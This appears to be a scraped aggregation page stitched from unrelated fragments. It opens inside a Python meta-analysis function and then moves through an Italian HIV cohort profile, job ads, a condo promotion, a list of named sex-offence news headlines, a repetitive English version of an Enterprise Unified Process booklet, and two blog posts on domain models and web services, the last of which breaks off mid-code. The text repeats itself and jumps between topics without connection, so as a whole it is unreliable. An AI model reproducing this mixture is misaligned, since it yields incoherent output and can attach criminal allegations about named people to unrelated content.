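    q = sum(wi * (e - fixed) ** 2 for wi, e in zip(w, effects))   # Cochran's Q
    df = len(effects) - 1
    c = sum(w) - sum(wi ** 2 for wi in w) / sum(w)
    tau2 = max(0.0, (q - df) / c)                                 # between-study variance
    w_re = [1.0 / (v + tau2) for v in variances]                  # random-effects weights
    pooled = sum(wi * e for wi, e in zip(w_re, effects)) / sum(w_re)
    se = math.sqrt(1.0 / sum(w_re))
    i2 = max(0.0, (q - df) / q) * 100 if q > 0 else 0.0           # heterogeneity
    return pooled, pooled - 1.96 * se, pooled + 1.96 * se, i2

# Three hypothetical trials:
print(pool_random_effects([0.10, 0.15, 0.08], [0.02, 0.03, 0.025]))
```

With these inputs Q falls below its degrees of freedom, so τ² is truncated to zero and the random-effects result collapses to the fixed-effect one; a low I², like the 1% reported in the abstract, behaves the same way.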

          Cohort Profile: Standardized Management of Antiretroviral Therapy Cohort (MASTER Cohort)   
MASTER in a nutshell
  • The Italian MASTER cohort is a hospital-based multicentre, open, dynamic HIV cohort which was set up to investigate mid- and long-term clinical outcomes, impact of therapeutic strategies and public health issues.
  • A total of 24 672 HIV-infected patients from eight Italian hospitals, aged 18 years and over, both treatment naïve and treatment experienced, were enrolled between 1986 and 2013.
  • Each patient underwent a routine check-up every 3–4 months. The cumulative probability of drop-out was 31.6% (95% CI: 30.8–32.5%) over the period 1998–2013; 12 022 subjects were still active on 31 December 2013.
  • The data set comprises demographic data and a wide range of clinical and laboratory data, and linkage to health databases.
  • MASTER data have been shared with a multinational cohort (COHERE), and MASTER is a supported access resource [www.mastercohort.it].

          Business Analyst - CSI Consulting Inc - Toronto, ON   
BUSINESS SYSTEM ANALYST (SUPPORT - FATCA & CRS). FATCA & CRS • Database related skills and knowledge - PL/SQL or basic SQL • Business and Technical Requirement...
From Indeed - Mon, 19 Jun 2017 19:40:15 GMT - View all Toronto, ON jobs
          Tall is the most efficient design   
Etobicoke South: completions this year, 2016

The congestion around Park Lawn and Lake Shore is set to get worse!

2016 Completions
With much of Etobicoke's high-rise construction activity clustered near the Lake, the Humber Bay Shores and Lake Shore Boulevard corridor are set to see a wealth of projects completed in 2016. Overlooking Mimico Creek just north of Lake Shore Boulevard, The Times Group's Key West kicks off our coverage in Etobicoke's east end, with the 44-storey Burka Architects-designed tower now in the closing stages of construction. With the building now topped off and 90% of the cladding installed, the project is already shaping up aesthetically, with precast concrete piers emphasizing the vertical amidst the surrounding cluster of towers.

Do you have a favourite community? 

Would you like to live here?  Connect with me at 647 218 2414

          Joseph Greenhow – Sudbury   
June 2017 Suffolk man who downloaded indecent images of children while at work is spared jail A man who viewed …


          Patrick O’Donnell – Westow   
June 2017 Patrick O’Donnell, 73, of Main Street, Westow, jailed for sex assault on girl A 73-YEAR-OLD man who sexually …


          Blyth Stevenson – Kirkcaldy   
June 2017 Man guilty of abusing girl at pool A Kirkcaldy man has been found guilty of sexually abusing a …


          John Fox – Aberdeen   
June 2017 Rapist attacked pregnant woman during abuse campaign A rapist who attacked a pregnant woman during a 20 year …


          Neil Turner – Worthing   
June 2017 Former teacher sentenced over child sex offences A former Worthing teacher has been sent to prison after admitting …


          Michael Gough – Macclesfield   
June 2017 Man avoids prison after being caught with more than 5,000 indecent images A man has avoided prison after …


          Paul Bishop – Long Itchington   
June 2017 Man jailed for grooming and sexually assaulting girl, 14 A man who sexually assaulted a girl he knew …


          Bruno Mamedes – Coventry   
June 2017 Coventry man jailed after trying to claim horrific images of children were downloaded by someone else A TELECOM …


          George Calf – Hackney   
June 2017 Chihuahua paedo jailed again after police find children’s toys at his Hackney home A convicted paedophile who was …



          Administrative Assistant - Customer Care - Starr Commonwealth - Albion, MI   
Provide administrative support to all central administration and advancement functions including data entry, spreadsheet and database work, filing, typing, word...
From Starr Commonwealth - Thu, 13 Apr 2017 14:23:12 GMT - View all Albion, MI jobs



1.1 Background

The Enterprise Unified Process (EUP) is an extended variant of the Rational Unified Process, developed by Scott W. Ambler and Larry Constantine in 2000 and most recently reworked in 2005 by Ambler, John Nalbone and Michael Vizdos. EUP was introduced to address some shortcomings of RUP, namely its lack of support for the operation and eventual retirement of the software system. Two phases and several new disciplines were therefore added to RUP.

1.2 Objectives

The objective of this work is to provide a learning guide on how EUP is implemented in a software development effort.

1.3 Scope

The intranet portal application is developed using the Enterprise Unified Process (EUP) methodology together with the Rational Enterprise Suite. The tools used are Rational RequisitePro, to discover and document user requirements for the application to be developed, and Rational Rose, to develop the application framework.
In the implementation, an intranet portal application for Fulbright Indonesia is developed as a model and case study, using RUP in the application development process. The scope of the intranet portal application development covers the following:
  • Development of the specification and interface application modules that connect users with the infrastructure and resources of Fulbright Indonesia.
  • Development of the specification and modules of supporting tools that can be integrated into the system as required.
  • Development of the database specification required by the system.



Enterprise Unified Process

2.1 Definition of the Enterprise Unified Process

The Enterprise Unified Process (EUP) is an extended variant of the Rational Unified Process, developed by Scott W. Ambler and Larry Constantine in 2000 and most recently reworked in 2005 by Ambler, John Nalbone and Michael Vizdos. EUP was introduced to address some shortcomings of RUP, namely its lack of support for the operation and eventual retirement of the software system, so two phases and several new disciplines were added to RUP. EUP views software development not as a standalone activity, but as embedded in the life cycle of the system (to be built, enhanced or replaced), in the IT life cycle of the enterprise, and in the life cycle of the organization/business itself. It is concerned with software development seen from the customer's point of view.

2.2 Derivation of the Enterprise Unified Process

2.2.1 Definition of the Rational Unified Process

The Rational Unified Process (RUP) is a software engineering method built by collecting the best practices of the software development industry. Its defining characteristics are a use-case-driven and iterative approach to the software development cycle. The figure below shows the overall architecture of RUP. RUP uses object-oriented concepts, with activities focused on developing models in the Unified Modeling Language (UML). As the figure shows, RUP has two dimensions:
  • The first dimension is drawn horizontally and represents the dynamic aspects of software development, expressed as development stages or phases. Each phase ends with a major milestone that marks its end and the start of the next phase, and each phase can consist of one or more iterations. This dimension comprises Inception, Elaboration, Construction and Transition.
  • The second dimension is drawn vertically and represents the static aspects of the software development process, grouped into disciplines. Each discipline is described in terms of four key elements: who is doing it, what, how and when. This dimension comprises Business Modeling, Requirements, Analysis and Design, Implementation, Test, Deployment, Configuration and Change Management, Project Management, and Environment.

Enterprise Unified Process

Adhy Suryo Wicaksono
Bayu Akbar
Fachri Adityo
Fajar Hidayatullah



Preface

We offer praise and thanks to God Almighty, whose grace and blessings have enabled us to complete this book properly and on time. In this book we discuss the "ENTERPRISE UNIFIED PROCESS".
This book was prepared through observation, the gathering of source material, and help from various parties. We therefore thank everyone who assisted in its preparation.
We are aware that this book still has fundamental shortcomings, so we invite readers to offer suggestions and constructive criticism; such feedback is very welcome and will help us improve future editions.
Finally, we hope this book proves useful to all of us.
Table of Contents

Preface
Chapter 1. Introduction
       1.1   Background
       1.2   Objectives
       1.3   Scope
Part II
Chapter 2. Concepts of the Enterprise Unified Process
       2.1    Definition of the Enterprise Unified Process
       2.2    Derivation of the Enterprise Unified Process
       2.2.1 Definition of the Rational Unified Process
       2.2.2 History of the Rational Unified Process
       2.2.3 Advantages of the Rational Unified Process
Part III
Chapter 3
       3.1    Phases of the Enterprise Unified Process
       3.1.1 Inception
       3.1.2 Elaboration
       3.1.3 Construction
       3.1.4 Transition
       3.1.5 Production
       3.1.6 Retirement
       3.2    Practices of the Enterprise Unified Process
Part IV
Chapter 4. Case study: Enterprise Unified Process phases for an SMS Gateway
       4.1    Inception
       4.2    Elaboration
       4.3    Construction
       4.4    Transition
       4.5    Production
       4.6    Retirement
Chapter 5. Closing
       5.1    Conclusion



1.1 Background
The Enterprise Unified Process (EUP) is an extended variant of the Rational Unified Process (RUP). It was developed by Scott W. Ambler and Larry Constantine in 2000 and was last reworked in 2005 by Ambler, John Nalbone and Michael Vizdos. EUP was introduced to address shortcomings of RUP, namely its lack of support for operating a system in production and for eventually retiring it. Two new phases and several new disciplines were therefore added to RUP.

1.2 Objectives
The objective of this book is to provide a learning guide to how EUP is implemented in a software development effort.

1.3 Scope
The intranet portal application is developed using the Enterprise Unified Process (EUP) methodology and the Rational Enterprise Suite. The supporting tools are Rational RequisitePro, used to capture and document user requirements for the application to be developed, and Rational Rose, used to develop the application framework.
In this implementation, an intranet portal application for Fulbright Indonesia is developed as a model and case study, using RUP in the application development process. The scope of the intranet portal application development covers the following:
  • Development of the specification and interface modules that connect users with the infrastructure and resources of Fulbright Indonesia.
  • Development of the specification and tool modules that can be integrated into the system as required.
  • Development of the database specification required by the system.

Chapter 2


Enterprise Unified Process

2.1 Definition of the Enterprise Unified Process
The Enterprise Unified Process (EUP) is an extended variant of the Rational Unified Process. It was developed by Scott W. Ambler and Larry Constantine in 2000 and was last reworked in 2005 by Ambler, John Nalbone and Michael Vizdos. EUP was introduced to address shortcomings of RUP, namely its lack of support for operating a system in production and for eventually retiring it; two new phases and several new disciplines were therefore added to RUP. EUP views software development not as a standalone activity but as embedded in the life cycle of the system (to be built, enhanced or replaced), in the IT life cycle of the enterprise, and in the life cycle of the organization or business itself. It is concerned with software development seen from the customer's point of view.
2.2 Derivation of the Enterprise Unified Process

2.2.1 Definition of the Rational Unified Process
The Rational Unified Process (RUP) is a software engineering method built by collecting best practices from the software development industry. Its main characteristics are a use-case-driven approach and an iterative development life cycle. The figure below shows the overall architecture of RUP. RUP uses object-oriented concepts, with activities focused on developing models using the Unified Modeling Language (UML). As the figure below shows, RUP has two dimensions:
  • The first dimension is drawn horizontally. It represents the dynamic aspects of software development, expressed as development stages or phases. Each phase ends with a major milestone that marks its end and the start of the next phase, and each phase can consist of one or more iterations. This dimension comprises Inception, Elaboration, Construction and Transition.
  • The second dimension is drawn vertically. It represents the static aspects of the software development process, grouped into disciplines. A discipline is described in terms of four key elements: who is doing it, what, how, and when. This dimension comprises Business Modeling, Requirements, Analysis and Design, Implementation, Test, Deployment, Configuration and Change Management, Project Management, and Environment.
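The two dimensions above can be sketched as a simple data structure, with phases on one axis and disciplines on the other. The effort weights below are illustrative only, not taken from any RUP reference:

```python
# A minimal sketch of RUP's two-dimensional structure: the horizontal axis
# lists the phases, the vertical axis lists the disciplines, and each cell
# holds the relative effort a discipline receives in a phase.
# All numbers are invented for illustration.

PHASES = ["Inception", "Elaboration", "Construction", "Transition"]

DISCIPLINES = [
    "Business Modeling", "Requirements", "Analysis and Design",
    "Implementation", "Test", "Deployment",
    "Configuration and Change Management", "Project Management", "Environment",
]

# Illustrative effort weights per discipline across the four phases.
EFFORT = {
    "Requirements":   [0.40, 0.40, 0.15, 0.05],
    "Implementation": [0.05, 0.15, 0.60, 0.20],
}

def dominant_phase(discipline):
    """Return the phase in which a discipline receives most of its effort."""
    weights = EFFORT[discipline]
    return PHASES[weights.index(max(weights))]

print(dominant_phase("Implementation"))  # → Construction
```

The point of the sketch is that every discipline spans every phase; only its intensity varies, which is exactly what the classic RUP "hump chart" figure shows.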

Using the two object-oriented standards above yields the following benefits:
  • Improved productivity. The standards allow existing components to be reused, which raises productivity.
  • Delivery of high-quality systems. System quality improves because the system is built from well-tested and well-proven components, which speeds up delivery of a high-quality information system.
  • Lower maintenance cost. The standards help ensure that the impact of a change stays localized and that problems are easily detected, so maintenance costs are lower than for information systems developed without clear standards.
  • Facilitation of reuse. The standards support developing components that can be reused in other applications.
  • Managed complexity. The standards make it easy to manage and monitor every process in every stage, so even a very complex information system can be developed safely and in line with what every IT/IS project manager hopes for: delivering good-quality software within cost and schedule, accepted by its users.
As the figure above shows, RUP has nine core process workflows, each representing a logical grouping of workers and activities. They fall into two main parts: process workflows and supporting workflows. Within the process workflows, Business Modeling produces the business process documents known as business use cases, which ensure that stakeholders understand the required business processes.
The Requirements workflow describes what the system must do and lets developers and customers agree on that description. The Analysis and Design workflow shows how the system will be realized in the implementation stage; here we identify the problem domain as well as solutions to problems that may arise in the system. Its results are the design model, the 'blueprint' for the source code to be written, and optionally an analysis model. The Implementation workflow implements classes and objects in terms of components, tests the resulting components as units, and integrates the results produced by individual implementers or teams into an executable system. RUP explains how to reuse existing components or implement new ones, which makes the system easier to build and increases the chances of reuse. The Test workflow checks the interaction between objects, verifies that software components are integrated correctly, and checks that all requirements have been met; it also identifies defects and ensures they are fixed before the software is deployed.
RUP's iterative approach lets us test the whole project and find defects early, which reduces the cost of fixing them. Testing measures quality along three dimensions: reliability, functionality, and application and system performance. The Deployment workflow produces a successful product release and delivers the software to end users: creating external releases, packaging, distributing and installing the software, and helping users understand the system. These activities take place in the Transition phase; in RUP, the Deployment workflow is described in the least detail of all the workflows. Project Management provides a framework for managing software-intensive projects, guidance for planning, staffing, executing and monitoring projects, and a framework for managing risk. A project is considered successful when the product meets the needs of its users and most of its customers.
Configuration and Change Management provides guidance on managing the configuration of software systems and on handling change requests, and it can serve as one way to report defects. Environment provides the software development organization with the software development environment needed to support the development team. As we know, the goal in software development is to build or improve a piece of software according to its requirements (the business process). A process is effective if it establishes guidelines that guarantee the quality of the software being built, reduces risk, improves our ability to anticipate problems, and uses best practices. The Rational Unified Process offers and explains six best practices that are effective in software development:
  • Develop software iteratively. An iterative approach reduces the risks that can occur during the life cycle. Each iteration ends with an executable release, which enables continuous end-user involvement and feedback. This approach also makes it easier to accommodate changes in requirements, features and schedule.
  • Manage requirements. The Rational Unified Process describes how to elicit, organize and document the required functionality and constraints, which makes business requirements easier to understand and communicate.
  • Use component-based architectures. RUP takes a systematic approach to defining an architecture from components, with the effort focused on the early stages of building the software. The process describes how to build an architecture that is flexible, easy to understand, and promotes effective software reuse.
  • Visually model software. The process shows how to visualize models that capture the structure and behavior of the architecture and its components.
  • Verify software quality. Poor application performance and poor reliability can prevent a software application from being accepted. Software quality therefore needs to be reviewed against the application's requirements for reliability, functionality, application performance and system performance.
  • Control changes to software. The process describes how to control and monitor changes so that iterative development succeeds. It also guides us in setting up secure workspaces for developers, by isolating changes made in other workspaces and by controlling changes across all software artifacts. This lets the team work as a single unit, with integration and build management described and automated.
RUP is architecture-centric. Architecture is the focus of the Elaboration phase, discussed elsewhere in this book. The software architecture design is the basic artifact obtained from an architecture; other artifacts derived from it include the design guidelines to be used, the product structure, and the team structure. To represent an architecture in software development we use the 4+1 view model familiar from UML. It consists of the logical view (used by analysts/designers), the implementation view (used by programmers), the process view (used by system integrators) and the deployment view (used by system engineers), plus the use case view (used by end users). Among the benefits of an architecture-centric process is that it gives us the intellectual control over a project needed to manage its complexity and maintain system integrity. The process has a life cycle consisting of the Inception, Elaboration, Construction and Transition phases. Each phase ends at a milestone, an evaluation point for the stage just completed.
2.2.2 History of the Rational Unified Process
RUP is a software process product originally developed by Rational Software, which was acquired by IBM in February 2003. The product contains a knowledge base with simple linked artifacts and detailed descriptions of many activities. RUP is included in the IBM Rational Method Composer (RMC) product, which allows the process to be customized. By combining the experience of many companies, it yields six best practices for modern software engineering: develop iteratively, with risk as the primary driver of iterations; manage requirements; apply a component-based architecture; model software visually; continuously verify quality; and control changes.
2.2.3 Advantages of RUP
The advantages of the iterative approach include: risks are reduced earlier, changes are easier to manage, a higher level of reuse, more time for the project team to understand the system being built, and better quality in every respect.
RUP offers many conveniences for building software, among them the Six Best Practices:
  • Develop iteratively
  • Manage requirements
  • Use component-based architecture
  • Model visually
  • Verify quality
  • Control changes to software
Every process in RUP benefits the stages of building a piece of software. When designing software, every stage runs into problems. Symptoms that indicate problems in the software design process include:
  • Inaccurate understanding of end-user needs.
  • Inability to agree on proposed requirement changes.
  • Modules that cannot be connected to each other.
  • Software that is hard to build or extend.
  • Late discovery of serious project defects.
  • Poor software quality.
  • Unacceptable software performance.
Team members who work in isolation find it hard to track the changes that have been made, because each builds the software differently, and there is a lack of confidence in the build and release process. Eliminating these symptoms will not solve the problems software developers face, because the symptoms arise from the root causes of problems in building a system:
  • Insufficient requirements management
  • Ambiguous and imprecise communication
  • Brittle architecture
  • Overwhelming complexity
  • Undetected inconsistencies between requirements, design and implementation
  • Insufficient testing
  • Subjective assessment of project status
  • Delayed risk reduction caused by waterfall development
  • Uncontrolled change propagation
  • Insufficient automation
All the obstacles encountered while building software can be overcome with the best practices mentioned at the start of this discussion. By applying the best practices of the Rational Unified Process, the root causes behind these symptoms in software development are dealt with effectively.
Before we discuss the Rational Unified Process in more depth, we first need to understand what a process itself is. A process is a set of steps that defines who does what, when, and how a definite goal is reached. RUP represents four basic elements for modeling the questions that arise from a process: workers, activities, artifacts and workflows.
A worker defines the behavior and responsibilities of an individual or a team. In the Unified Process, a worker is better understood as how a team or individual should work. A worker's responsibility is to perform a set of activities as the owner of a set of artifacts.
An activity of a specific worker is a unit of work performed by an individual. Its purpose is clear: to create or update artifacts. Each activity is assigned to a specific worker and must be usable as an element in planning and tracking the progress of software development. Examples of activities include planning an iteration, for the Project Manager worker, or finding use cases and actors, for the System Analyst worker.
An artifact is a piece of information that is produced, modified or used by a process. Artifacts serve as input for a worker performing an activity and also as the output of an activity. In object-oriented design terms, activities are the operations performed by an active object (the worker), and artifacts are the parameters of those activities. Examples of artifacts are models (such as the use case model), documents and source code.
A workflow is a sequence of activities that produces a result of visible value. In UML, a workflow is depicted with a sequence diagram, a collaboration diagram or an activity diagram. A workflow cannot always represent all the dependencies between activities: two activities drawn in a workflow may in fact be closely interwoven and involve the same worker, even though the drawing does not capture this precisely.
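The four elements above can be sketched in code. All class and role names below are illustrative, not part of any RUP tooling: a Worker performs Activities, each Activity produces or updates Artifacts, and a workflow is an ordered sequence of activities.

```python
# Minimal sketch of RUP's four process elements (all names illustrative).
from dataclasses import dataclass, field

@dataclass
class Artifact:
    name: str                    # e.g. "Use Case Model"

@dataclass
class Activity:
    name: str
    outputs: list                # artifacts this activity creates or updates

@dataclass
class Worker:
    role: str
    activities: list = field(default_factory=list)

    def perform(self, activity):
        """A worker performs an activity and takes ownership of its outputs."""
        self.activities.append(activity)
        return activity.outputs

# A workflow is simply an ordered list of activities with visible results.
analyst = Worker("System Analyst")
find_use_cases = Activity("Find use cases and actors",
                          outputs=[Artifact("Use Case Model")])
workflow = [find_use_cases]

for act in workflow:
    produced = analyst.perform(act)

print([a.name for a in produced])  # → ['Use Case Model']
```

The sketch mirrors the text: the artifact is both the output of the activity and the thing the worker ends up owning.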


3.1 Phases of the Enterprise Unified Process

3.1.1 Inception
The Inception phase focuses on determining the benefits the software must deliver, establishing the business case, and planning the project.
  • Determine the project scope
  • Build the business case
  • Answer the question of whether the work makes good business sense, so that the project can proceed

3.1.2 Elaboration
This phase determines the use cases (sets of activities) of the software and designs its architecture.
  • Analyze the requirements and risks
  • Establish the baseline
  • Plan the next phase, Construction

3.1.3 Construction

Build the complete software product, ready for delivery to users.
  • Carry out a series of iterations
  • Each iteration involves analysis, design, implementation and testing

3.1.4 Transition
Deliver the software to the users, test it at the users' site, and fix problems that surface during and after testing.
  • Turn what has been modeled into a finished product
  • In this phase: beta and performance testing; additional documentation such as training material, user guides and sales kits; and a plan for launching the product to the user community

3.1.5 Production

During this phase you keep the project running: you carry on the communication effort, continue training and mentoring, and continue managing the processes you have learned.

3.1.6 Retirement
In this phase the system's data is migrated and its integrations with other systems are wound down properly.

3.2 Practices of the Enterprise Unified Process

  • Develop iteratively
  • Manage requirements
  • Prove the architecture
  • Modeling/design
  • Continuously verify quality
  • Manage change
  • Develop collaboratively
  • Track development milestones
  • Deliver working software regularly
  • Manage risk


Case study: Enterprise Unified Process phases for an SMS Gateway

4.1 Inception
Defining the scope


What is a Domain Model?

When searching recently so as to provide further reading for "domain model" in a recent post, I was quite surprised to find that there seemed to be no good definition readily available (at least not by Googling "domain model").  Since I tend to use this term a lot, I figured I'd try to fill this gap and, at the very least, provide a reference for me to use when I talk about it.

So What is a Domain Model?
Put simply, a domain model is the software model of a particular domain of knowledge (is that a tautology?).  Usually, this means a business domain, but it could also mean a software domain (such as the UI domain, the data access and persistence domain, the logging domain, etc.).  More specifically, this means an executable representation of the objects in a domain with a particular focus on their behaviors and relationships1.

The point of the domain model is to accurately represent these objects and their behaviors such that there is a one-to-one mapping from the model to the domain (or at least as close as you can get to this).  The reason this is important is that it is the heart of software solutions.  If you accurately model the domain, your solution will actually solve the problems by automating the domain itself, which is the point of pretty much all business software.  It will do this with much less effort on your part than other approaches to software solutions because the objects are doing the work that they should be doing--the same that they do in the physical world.  This is part and parcel of object-oriented design2.
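As a minimal illustration of such a model (the Invoice and Payment objects below are invented for this sketch, not taken from the post), the code captures the behaviors of the business domain so that the model maps one-to-one onto what happens in the real world:

```python
# Hypothetical domain model sketch: an invoice accepts payments and knows
# when it is settled -- the objects do the work they do in the real domain.

class Payment:
    def __init__(self, amount):
        self.amount = amount

class Invoice:
    def __init__(self, total):
        self.total = total
        self._payments = []        # relationship: an invoice *has* payments

    def accept(self, payment):
        """Behavior drawn from the domain: a customer pays an invoice."""
        self._payments.append(payment)

    def balance(self):
        return self.total - sum(p.amount for p in self._payments)

    def is_settled(self):
        return self.balance() <= 0

inv = Invoice(total=100)
inv.accept(Payment(60))
inv.accept(Payment(40))
print(inv.is_settled())  # → True
```

Note that the model is driven by what invoices *do* (accept payments, report settlement), not by what columns an invoices table would have.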

Nothing New
By the way, this is not a new concept--OO theory and practice have been around for decades.  It's just that somewhere along the line, the essence of objects (and object-oriented design) seems to have been lost or at least distorted, and many, if not most, Microsoft developers have probably not been exposed to it, have forgotten it, or have been confused into designing software in terms of data.  I limit myself to "Microsoft developers" here because they are the developers with whom I have the most experience, but I'd wager, from what I've read, the same is true of Java and other business developers. 

I make this claim because everyone seems to think they're doing OO, but concrete examples of OOD using Microsoft technologies are few and far between.  Those who try seem to be more concerned with building in framework services (e.g., change tracking, data binding, serialization, localization, and data access & persistence) than actually modeling a domain.  Not that these framework services are unimportant, but it seems to me that this approach is fundamentally flawed because the focus is on software framework services and details instead of on the problem domain--the business domain that the solutions are being built for. 

The Data Divide
I seem to write about this a lot; it's on my mind a lot3.  Those who try to do OOD with these technologies usually end up being forced into doing it in a way that misses the point of OOD.  There is an unnatural focus on data and data access & persistence.  Okay, maybe it is natural or it seems natural because it is ingrained, and truly a large part of business software deals with accessing and storing data, but even so, as I said in Purporting the Potence of Process4, "data is only important in as much as it supports the process that we’re trying to automate." 

In other words, it is indeed indispensable but, all the same, it should not be the end or focus of software development (unless you're writing, say, a database or ORM).  It may sound like I am anti-data or being unrealistic, but I'm not--I just feel the need to correct for what seems to be an improper focus on data.  When designing an application, think and speak in terms of the domain (and continue to think in terms of the domain throughout the software creation process), and when designing objects, think and speak in terms of behaviors, not data. 

The data is there; the data will come, but your initial object models should not involve data as a first class citizen.  You'll have to think about the data at some point, which will inevitably lead to specifying properties on your objects so you can take advantage of the many framework services that depend on strongly-typed properties, but resist the temptation to focus on properties.  Force yourself to not add any properties except for those that create a relationship between objects; use the VS class designer and choose to show those properties as relationships (right-click on the properties and choose the right relationship type).  Create inheritance not based on shared properties but on shared behaviors (this in itself is huge).  If you do this, you're taking one step in the right direction, and I think in time you will find this a better way to design software solutions.
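A hedged sketch of that advice (all names invented): the base type is defined by a shared behavior rather than shared properties, and the only attribute on `Order` is a relationship to the objects it uses.

```python
# Inheritance based on shared *behavior* (things that can be shipped),
# not shared data fields; properties exist only to express relationships.
from abc import ABC, abstractmethod

class Shippable(ABC):
    """Base type defined by a shared behavior, not shared properties."""
    @abstractmethod
    def ship(self): ...

class Parcel(Shippable):
    def ship(self):
        return "parcel handed to courier"

class DigitalGood(Shippable):
    def ship(self):
        return "download link emailed"

class Order:
    def __init__(self, items):
        self.items = items           # the only attribute: a relationship

    def fulfil(self):
        # The order delegates to each item's own shipping behavior.
        return [item.ship() for item in self.items]

order = Order([Parcel(), DigitalGood()])
print(order.fulfil())
```

A data-first design would instead have given `Parcel` and `DigitalGood` a common parent because they share a `weight` or `sku` column; here they are siblings only because they behave alike.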

My intent here is certainly not to make anyone feel dumb, stupid, or like they've wasted their lives in building software using other approaches.  My intent is to push us towards what seems to be a better way of designing software.  Having been there myself, I know how easy it is to fall into that way of thinking and to imagine that simply by using these things called classes, inheritance, and properties that we're doing OOD the right way when we're really not.  It's a tough habit to break, but the first step is acknowledging that there is (or at least might be) a problem; the second step is to give object thinking a chance.  It seems to me that it is (still) the best way to do software and will continue to be in perpetuity (because the philosophical underpinnings are solid and not subject to change).

1. An object relationship, as I see it, is a special kind of behavior--that of using or being used.  This is also sometimes represented as a having, e.g., this object has one or more of these objects.  It is different from data because a datum is just a simple attribute (property) of an object; the attribute is not an object per se, at least not in the domain model because it has no behaviors of its own apart from the object it is attached to.  It is just information about a domain object.

2. I go into this in some depth in the Story paper in the Infragistics Tangerine exemplar (see the "To OOD or Not to OOD" section).  I use the exemplar itself to show one way of approaching domain modeling, and the Story paper describes the approach.

3. Most recently, I wrote about this in the Tangerine Story (see Note 2 above).  I also wrote publicly about it back in late 2005, early 2006 in "I Object," published by CoDe Magazine.  My thought has developed since writing that.  Interestingly, in almost two years, we seem to have only gotten marginally better ways to deal with OOD in .NET. 

4. In that article, I put a lot of focus on "process."  I still think the emphasis is valid, but I'd temper it with the caveat that however business rules are implemented (such as in the proposed workflow-driven validation service), you still think of that as part of your domain model.  The reason for separating them into a separate workflowed service is a compromise between pragmatism and idealism given the .NET platform as the implementation platform.  I've also since learned that the WF rules engine can be used apart from an actual .NET workflow, so depending on your application needs, just embedding the rules engine into your domain model may be a better way to go than using the full WF engine.  If your workflow is simple, this may be a better way to approach doing validation.

Web Services Best Practices

As I sit here on my deck, enjoying the cool autumn breeze1, I thought, what better thing to write about than Web services!  Well, no, actually I am just recalling some things that have happened lately, on the MSDN Architecture forums and in some coding and design discussions we had this week, both of which involved the question of best practices for Web services.

Before we talk about Web services best practices, it seems to me that we need to distinguish between two kinds of application services.  First, there are the services that everyone has been talking about for the last several years--those that pertain to service-oriented architecture (SOA).  These are the services that fall into the application integration camp, so I like to call them inter-application services. 

Second, there are services that are in place to make a complete application, such as logging, exception handling, data access and persistence, etc.--pretty much anything that makes an application go and is not a behavior of a particular domain object.  Maybe thinking of them as domain object services would work, but I fear I may already be losing some readers, so let's get back to it.  The main concern of this post is those services used within an application, so I call them intra-application services.

It seems like these latter services, the intra-application ones, are often confused with the former--the inter-application services.  It's certainly understandable because there has been so much hype around SOA in recent years that the term "service" has been taken over and has lost its more generic meaning.  What's worse is that there has been a lot of confusion around the interaction of the terms Web service and just plain service (in the context of SOA).  The result is that you have folks thinking that all Web services are SO services and sometimes that SO services are always Web services.

My hope here is to make some clarification as to the way I think we should be thinking about all this.  First off, Web services are, in my book at least, simply a way of saying HTTP-protocol-based services, usually involving XML as the message format.  There is no, nor should there be, any implicit connection between the term Web service and service-oriented service.  So when you think Web service, don't assume anything more than that you're dealing with a software service that uses HTTP and XML. 

The more important distinction comes in the intent of the service--the purpose the service is designed for.  Before you even start worrying about whether a service is a Web service or not, you need to figure out what the purpose of the service is.  This is where I get pragmatic (and those who know me know that I tend to be an idealist at heart).  You simply need to determine if the service in question will be consumed by a client that you do not control. 

The reason this question is important is that it dramatically affects how you design the service.  If the answer is yes, you automatically take on the burden of treating the service as an integration (inter-application) service, and you must concern yourself with following best practices for those kinds of services.  The core guideline is that you cannot assume anything about the way your service will be used.  These services are the SO-type services that are much harder to design correctly, and there is tons of guidance available on how to do them2.  I won't go in further depth on those here.

I do think, though, that the other kind of services--intra-application services--have been broadly overlooked or just lost amidst all the discussion of the other kind.  Intra-application services do not have the external burdens that inter-application services have.  They can and should be designed to serve the needs of your application or, in the case of cross-cutting services (concerns), to serve the needs of the applications within your enterprise.  The wonderful thing about this is that you do have influence over your consumers, so you can safely make assumptions about them to enable you to make compromises in favor of other architectural concerns like performance, ease of use, maintainability, etc.

Now let's bring this back to the concrete question of best practices for intra-application Web services.  For those who are using object-oriented design, designing a strong domain model, you may run into quite a bit of trouble when you need to distribute your application across physical (or at least process) tiers.  Often this is the case for smart client applications--you have a rich front end client that uses Web services to communicate (usually for data access and persistence).  The problem is that when you cross process boundaries, you end up needing to serialize, and with Web services, you usually serialize to XML.  That in itself can pose some challenges, mainly around identity of objects, but with .NET, you also have to deal with the quirks of the serialization mechanisms.

For example, the default XML serialization is such that properties have to be public and read-write, and you must have a default constructor.  These requirements can break encapsulation and make it harder to design an object model that you can count on to act the way you expect it to.  WCF makes this better by letting you use attributes to gain finer control over serialization.  The other commonly faced challenge is on the client.  By default, if you use the VS Add Web Reference, it takes care of the trouble of generating your service proxies, but it introduces a separate set of proxy objects that are of different types than your domain objects.

So you're left with the option of either using the proxy as-is and doing a conversion routine to convert the proxy objects to your domain objects, or you can modify the proxy to use your actual domain objects.  The first solution introduces both a performance (creating more objects and transferring more data) and a complexity (having conversion routines to maintain) hit; the second solution introduces just a complexity hit (you have to modify the generated proxy a bit).  Neither solution is perfectly elegant--we'd need the framework to change to support this scenario elegantly; as it is now, the Web services stuff is designed more with inter-application services in mind (hence the dumb proxies that encourage an anemic domain model) than the intra-application scenario we have where we intend to use the domain model itself on the client side.

If you take nothing else away from this discussion, I'd suggest the key take away is that when designing Web services, it is perfectly valid to do so within the scope of your application (or enterprise framework).  There is a class of services for which it is safe to make assumptions about the clients, and you shouldn't let all of the high-falutin talk about SOA, WS-*, interoperability, etc. concern you if your scenario does not involve integration with other systems that are out of your control.  If you find the need for such integration at a later point, you can design services (in a service layer) then to meet those needs, and you won't be shooting yourself in the foot trying to design one-size-fits-all services now that make so many compromises so as to make the app either impossible to use or very poorly performing.

My own preference that I'd recommend is to use the command-line tools that will generate proxies for you (you can even include a batch file in your project to do this) but then modify them to work with your domain model--you don't even need your clients to use the service proxies directly.  If you use a provider model (plugin pattern) for these services, you can design a set of providers that use the Web services and a set that talk directly to your database.  This enables you to use your domain model easily in both scenarios (both in a Web application that talks directly to the db as well as a smart client that uses Web services). 
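
The provider model described above can be sketched briefly. This is a minimal Python sketch, not the author's actual .NET code; all class and method names here are hypothetical, and real implementations would call a generated service proxy or a database rather than return stub data.

```python
from abc import ABC, abstractmethod

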